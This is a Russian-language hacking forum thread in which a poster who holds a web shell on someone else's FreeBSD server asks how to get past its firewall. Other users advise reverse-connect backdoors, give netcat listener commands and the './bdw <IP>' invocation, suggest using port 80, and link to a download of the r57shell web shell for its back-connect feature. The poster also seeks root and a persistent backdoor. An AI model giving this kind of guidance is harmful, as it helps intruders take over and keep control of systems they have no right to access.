|
Обойти фаерволл в FreeBSD
Короче висит операционка FreeBSD.У мя есть веб шелл с правами nobody.На системе мне можно применять команду perl.Я когда запускаю какой-нить бинд шелл,то этот порт открывается(видно при команде show opened ports).Но подключиться к этому порту не могу.Интуиция подсказывает на 100%,что там сидит фаерволл.С помощью какого бинд шелла мне его обойти???И где достать этот шелл?
|
Это во многом зависит от настройки фаервола. Думаю нужно рулить в сторону спуфинга (обычно для локалхоста или локалки разришают больше, чем для интернета), но если в правилах обазначенны устройства (via lo0, via tun0 и тд и тп), то ничего из спуфинга не выйдет.
Подделка ip не даст тебе коннекта на тот комп (вывод не будет возаращатся тебе), но, возможно, ты сможешь выполнять команды (слепо). :] |
scorpion, юзай Connect-Back Backdoor.
bdw.c Цитата:
|
Что-то я стормозил... Дейсвительно, так проще. :]
|
Спасибо вам fucker"ok и virgoz
Обоим по +1 репутации :)))) |
VIRGOZ
Слушь как я понял:Мне надо на своём винте запустить nc -l -p 4000 .А на взломаном сервере мне надо будет сделать ./bdw <мой IP> .Прав я??? |
scorpion, можно и так. Но для безопасности, я бы запускал netcat на серваке.
|
Добавить можно то, что если back-connect делать на жестко зафорваленной машине, имеет смысл на общедоступных портах...
Топишь как правило 80 порт тут прокатит.. |
Слушайте есть ли такой back connect на перл языке.Просто дело в том,что у меня нет прав ./file А запускать перл файл без проблем.Так что мне нужно,чтоб я на своей системе запустил бы nc -l -p 666 ,а на сервере запустил бы перл шелл,который бы подключился бы на мою тачку и так бы я обошёл firewall.Кто-нить можете помочь???
Где взять такой перл шелл??? P.S За хорошую помощь поднимаю репутацию всегда... |
А разве твой шел не от rst ? :p
Цитата:
http://rst.void.ru/download/r57shell.txt |
Слушайте,когда я загрузил r57shell.php на сервер,то я увидел внизу опцию back-connect.Я должен у ся на системе пустить nc -l -p 4000,а там в back-connect написать мой IP и порт 4000.Да???
|
Догадливый =) Да именно, так.
|
Слушь короче запускаю я у себя nc -l -p 4000.Потом там в этом шелле в backconnect'е я завожу мой ip address(у меня стоит роутер и нас четверо.Адрес роутера 85.195.59.x,а мой локальный адрес 192.168.1.x .Который надо туда вписать?)Я пробовал оба вписывать,выходило сообщение Now script try to connect ip : port. Но в netcat ничего не появляется.Может быть такое что роутер не даёт войти?Так как у меня один раз такое было с RAdmin'ом.Короче я у себя запустил,а с друга компа не мог войти.Что мне надо будет сделать???И чего это вина???
|
Да... Не лучше ли один раз описать свою проблему более детально?
То одно - то другое... |
Я в последнем посте хорошо описал свою проблему.Кто знает,тот поймёт.Так что кто знает пусть подскажет как это исправить???
|
Возможно фаерволл забивает и бэк-коннекты тоже. Такое у меня бывало, попробуй ещё скрипты perl бэк-коннектов. Если не поможет, забей, серваков и инете море.
|
Короче взлом серьёзный.Я не хочу просто ломать сайты подрят,а мне нужен этот сервак.У меня есть пароль рута.Мне нужен только bindshell.Что мне делать???Скорее всего я думаю,что роутер не даёт на мой порт сесть.Так что мне прийдёться проверять на другом компе....
Большое спасибо всем!!! Просьба не закрывать эту тему.Если есть тдеи,то говорите... |
а ты после бек коннекта смотрел там на полосе в рст шелле пишется иногда ошибка...но раз говоришь не было ошибки но коннекта тоже значит фаер 90%...
если есть пасс рута то по ssh не можешь коннектиться?а бинд шелл не надо лучше бекдор |
Слушь короче не могу я конектиться по ssh.Так как в конфиге только локалхост может конектиться.Что мне делать.Где достать этот бэкдор,или как сделать бинд,самое главное что мне нужно,чтоб я смог стать бы рутом...
|
НУ ЧТО КТО-НИТЬ ПОДСКАЖЕТ???
|
| Время: 01:14 |